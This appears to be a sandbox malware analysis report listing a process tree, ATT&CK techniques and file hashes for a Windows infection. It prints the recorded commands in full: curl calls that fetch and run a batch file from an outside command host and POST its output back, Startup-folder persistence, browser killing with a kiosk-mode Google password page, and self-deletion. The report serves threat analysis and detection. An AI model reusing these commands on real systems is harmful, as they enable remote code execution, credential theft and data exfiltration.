C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:4128
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2144
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:2324
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3864
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:6048
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:6068
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5292
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:1100
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5312
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5724
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:5784
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5920
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:3708
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:1252
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5256
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:3560
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:2460
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:5504
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5536
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5048
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:1500
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:6120
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:812
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe"C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014321001\TdDkUco.exe" & rd /s /q "C:\ProgramData\EUA1N7YM7GV3" & exit4⤵
- System Location Discovery: System Language Discovery
PID:4392 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1676
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 20964⤵
- Program crash
PID:5088
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe"C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014323001\pcrndBC.exe" & rd /s /q "C:\ProgramData\4E37YCBIEU37" & exit4⤵
- System Location Discovery: System Language Discovery
PID:1876 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3156
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 19244⤵
- Program crash
PID:2960
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014335001\71fe6c16cb.exe"C:\Users\Admin\AppData\Local\Temp\1014335001\71fe6c16cb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 6524⤵
- Program crash
PID:2072
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe"C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4848 -
C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe"C:\Users\Admin\AppData\Local\Temp\1014336001\c56caa7321.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2336
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014337001\e5779c09bf.exe"C:\Users\Admin\AppData\Local\Temp\1014337001\e5779c09bf.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2356 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:3800
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3936 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {454e0996-3b1f-4cd0-9549-d7fb065671f7} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" gpu6⤵PID:3656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {30e373f0-7840-443e-9591-41f1d8189a28} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" socket6⤵PID:4632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3040 -childID 1 -isForBrowser -prefsHandle 3148 -prefMapHandle 2912 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9831a753-bd7c-4690-9a3a-96e8bbe8a227} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab6⤵PID:3132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3972 -childID 2 -isForBrowser -prefsHandle 3956 -prefMapHandle 3952 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {110d6d04-dec9-4419-a44b-dbada57f00f5} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab6⤵PID:2256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4860 -prefMapHandle 4396 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dc04160-26a2-4c50-9c9d-640a6e1f7c4c} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" utility6⤵
- Checks processor information in registry
PID:5764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 3 -isForBrowser -prefsHandle 5428 -prefMapHandle 5432 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8a5c04c-a691-45ad-a6ef-11931bb28d96} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab6⤵PID:2188
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5560 -childID 4 -isForBrowser -prefsHandle 5584 -prefMapHandle 5588 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ce701fa-04a5-49b4-847e-ec8605d810c1} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab6⤵PID:1912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5760 -childID 5 -isForBrowser -prefsHandle 5768 -prefMapHandle 5772 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a520991c-1f43-4a7f-b4ce-47992075aa60} 3936 "\\.\pipe\gecko-crash-server-pipe.3936" tab6⤵PID:952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014338001\22fcf6fdee.exe"C:\Users\Admin\AppData\Local\Temp\1014338001\22fcf6fdee.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4956
-
-
C:\Users\Admin\AppData\Local\Temp\1014339001\240522a5a3.exe"C:\Users\Admin\AppData\Local\Temp\1014339001\240522a5a3.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5148
-
-
C:\Users\Admin\AppData\Local\Temp\1014340001\7b63f09152.exe"C:\Users\Admin\AppData\Local\Temp\1014340001\7b63f09152.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5832
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 944 -ip 9441⤵PID:1088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1176 -ip 11761⤵PID:1504
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4628 -ip 46281⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5600
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
345B
MD5b7896b50af5e87b166787ca6990fe0f6
SHA186591f092ea7eb55c6c4db7bbec76204d95e69b8
SHA256be60d9c4534a7d25de54922942ea611b6399a5cded28bd5ba170de9cf4462801
SHA512097fce9a60561012d9a5ddb9ab8be79f7f82e14b3c3355fb227e8383f6d7f58dfd29a76eb47b2d0b182ea532039b0860409bd4c732ac9b5de14d5a0fb65a9398
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD529ce8db83496307e798b354dae467ccf
SHA107cc10bf71bd46076b6d73e8a2707a8902cdf96f
SHA2567d865216da48c6e919b21ef39da285c352696fb570d4c04e5fc97d3afdca9abd
SHA51265e3100e63b8a19dc5a79e277ac9a11266dd30ce2daf6d59f0b54a8caf1f0d79119811a33756c446a42d9b5096c5912c67cc4801c29d650a467cc772a6df327f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9452F411289BE952D2567554C2622C59
Filesize548B
MD5044c97325648121b5f1a9815d9f9baac
SHA1af4e3f670002d6d72f31ba42883014810e95eb13
SHA2569e80a71fbd1e9d8455da70fbf2189828412887ebcdc27101f73881ae5cfeacc5
SHA5121ff995fb7c2583f8a47751aa7b9342f7670f11767dde7f908e3d11a987cadfb7be9ff07cd46ea21c898ed2151baf4f7a468ebc20378dc56ec57875cf7bc94075
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\activity-stream.discovery_stream.json
Filesize25KB
MD5fd3d4ce8ec68e8279cc3f7652afd3b4d
SHA1b28803af123ec13e1f145a25074d5fb11f0f656c
SHA2561de4204c08fb269613dab1e99f7d49c8fa04b2270228122b384d1d2743be3952
SHA512de357c3ec4a7f7b3aaf9a767ad2d18d7d31f2063477f350ed2db2aedca424e3bda1a5767405b1517e1818294f54bc60a61970e1134cffec968c723c3cff4326f
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
Filesize13KB
MD553e8af6ad4acc29bf43277a32463692d
SHA1c7d480f19346623bb91339486650358e9d0ce355
SHA25686b2205bb052df1a1c7df2a2739a87f8a61223f5591b072d26d80edd506c027b
SHA5122306356a9802ee49381a5c0dcfb25bce045c7b1a215fa88fdeef14b6e004678a24f503ee93397d27e6958e1407b1856ed90154be8d45c8725875167297d72661
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
419KB
MD5ec5e3bc0d1d207a45d0f7e27e8f111c7
SHA12de3cb791c7e3aa0826c59b2f85fdb4335d9b84f
SHA2564d0126ee20144c065da90de50807354877e8015c020a99a1d3f7cf3e051b5817
SHA512cb660188329b067b69dc0e7d291b9fe545688c79ce9b0f117a63d0596e6a27f8cd7a1b199abc6f07284077213ac2a42ce0ad18376824fabbdd4437a5e10b5a34
-
Filesize
710KB
MD528e568616a7b792cac1726deb77d9039
SHA139890a418fb391b823ed5084533e2e24dff021e1
SHA2569597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2
SHA51285048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5
-
Filesize
898KB
MD55950611ed70f90b758610609e2aee8e6
SHA1798588341c108850c79da309be33495faf2f3246
SHA2565270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
